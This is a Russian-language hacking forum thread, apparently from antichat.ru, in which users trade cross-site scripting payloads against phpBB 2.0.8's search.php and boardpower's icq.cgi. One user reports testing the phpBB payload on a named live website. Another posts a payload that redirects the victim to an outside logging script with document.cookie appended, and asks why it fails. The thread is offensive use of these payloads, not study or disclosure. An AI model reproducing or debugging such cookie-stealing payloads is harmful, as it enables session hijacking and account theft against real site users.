В phpBB 2.0.8 есть уязвимость в search.php и показан пример </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">http://www.example.com/phpBB2/search.php?search_author='<script&gt;alert(document.c ookie)&lt;/script&gt;[/QUOTE]<span id='postcolor'>
проверал на саитах но не на одново неработает, например:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">http://www.bpmdigitaldjgear.com/phpBB2/search.php?search_author='<script&gt;alert('kkl'http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif;&lt;/script&gt;[/QUOTE]<span id='postcolor'>

помогите, что делаю нетак?

Закрыта там эта бага...
Да все равно от нее толку - ноль

Вот нашел boardpower баг работаюший если так
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">boardpower/icq.cgi?action=<script&gt;javascript:alert(document.c ookie);&lt;/script&gt;[/QUOTE]<span id='postcolor'>
показивает как надо, но если так
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">boardpower/icq.cgi?action=%3Cscript%3Ewindow.location='http://antichat.ru/cgi-bin/s.jpg?Info='+document.cookie%3C/script%3E[/QUOTE]<span id='postcolor'>
то неработает.
почему &nbsp;window.location неработает?